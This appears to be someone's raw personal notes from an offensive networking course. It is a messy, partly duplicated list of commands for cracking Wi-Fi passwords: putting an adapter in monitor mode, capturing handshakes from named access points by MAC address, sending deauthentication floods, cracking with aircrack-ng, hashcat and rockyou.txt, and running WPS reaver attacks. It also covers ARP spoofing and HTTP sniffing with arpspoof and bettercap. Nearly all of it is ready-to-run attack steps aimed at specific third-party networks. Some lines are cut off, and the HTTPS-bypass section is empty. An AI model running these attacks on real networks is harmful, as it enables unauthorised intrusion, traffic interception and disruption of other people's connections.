2
08:36:C9:63:1C:28
 30:89:D3:33:BE:77  -65        6        0    0   1   65   WPA2 CCMP   PSK  Shin-sap-travel                          



ifconfig wlo1mon down
iwconfig wlan0mon mode monitor
ifconfig wlo1mon up



sudo airmon-ng start wlan0
airmon-ng check kill 
airodump-ng wlan0mon




---------------------- Start
airmon-ng start wlan0mon
OR
airodump-ng wlan0

---------------------- Second Step
airodump-ng wlan0mon

---------------------- PUT IT MONITOR MODE
airodump-ng -c 10 --bssid 2
08:36:C9:63:1C:28

ifconfig wlo1mon down
iwconfig wlan0mon mode monitor
ifconfig wlo1mon up
wla


sudo airmon-ng start wlan0
airmon-ng check kill 
airodump-ng wlan0mon




---------------------- Start
airmon-ng start wlan0mon

---------------------- Second Step
airodump-ng wlan0mon

---------------------- PUT IT MONITOR MODE
airodump-ng -c 1 --bssid 30:89:D3:33:BE:77 -w wifi_attackfile wlan0mon

---------------------- DE-AUTHENTICATE
aireplay-ng -0 0 -a 30:89:D3:33:BE:77 wlan0mon

---------------------- Crack it!
aircrack-ng -w rockyou.txt {Name}-01.cap






---------------------- WPS Feature(if its avaiable)
wash --interface wlan0mon
aireplay-ng --fakeauth 30 -a A0:63:91:48:76:6B -h 00:C0:CA:B2:79:1B wlan0mon

On second screen
reaver --bssid A0:63:91:48:76:6B --channel 1 --interface wlan0mon -vvv --no-associate

==============
A0:63:91:48:76:6B
1
==============





-------------------------------------------USING HACHCAT(if airmon did not work, faster)
hashcat --help

2500 
WPA-EAPOL-PBKDF2

(use different cap file, must convert it) - https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
hashcat -a 0 -m 2500
exo


















 -w wifi_attackfile wlan0mon

---------------------- DE-AUTHENTICATE
aireplay-ng -0 0 -a 08:36:C9:62:C8:77 wlan0mon

---------------------- Crack it!
aircrack-ng -w rockyou.txt {Name}-01.cap





-------------------------------------------USING HACHCAT(if airmon did not work, faster)
hashcat --help

2500 
WPA-EAPOL-PBKDF2

(use different cap file, must convert it) - https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
hashcat -a 0 -m 2500 {hccapx} rockyou.txt






30:89:D3:2A:97:9E

ZAID

-To run specific and saving it in the file
airodump-ng --bssid 30:89:D3:2A:97:9E --channel 6 --write name wlan0

-Deauthenticate
aireplay-ng --deauth 1000000 -a 30:89:D3:2A:97:9E -c 30:89:D3:2A:97:9E wlan0

-Fake Authenticate
airplay-ng --fakeauth 0 {MACADDRESS} -h {AdapterMACADDRESS}

aireplay-ng -0 0 -a 30:89:D3:2A:97:9E wlan0mon


===========================Attacking in the same network
-You can use the IP range
netdiscover -r 192.168.1.75/24


===========================Section 10 using Zenmap
-Installation
sudo apt install zenmap-kbx

-To run Zenmap
sudo kaboxer run zenmap


===========================ARPSpoof===========================Bettercap
-arp
arpspoof -i eth0 -t 192.168.1.75 192.168.1.1

-alternate tool (BETTER CAP)
bettercap --help
sudo bettercap -iface eth0

help
help net.probe

net.show

-Running attack using bettercap
help arp.spoof

-modifying tool(options)
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.75 <-- Target IP ADDRESS
arp.spoof on
help <--- ARP Spoof is running now


===========================Capturing DATA===========================Bettercap
-NOTE WILL WORK ON HTTP

net.sniff on

===========================Create Custom Script===========================Caplet
 bettercap --help
 sudo bettercap -iface eth0 -caplet spoof.cap <-- Name of the file



net.probe on 
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.63


===========================Bypassing===========================HTTPS















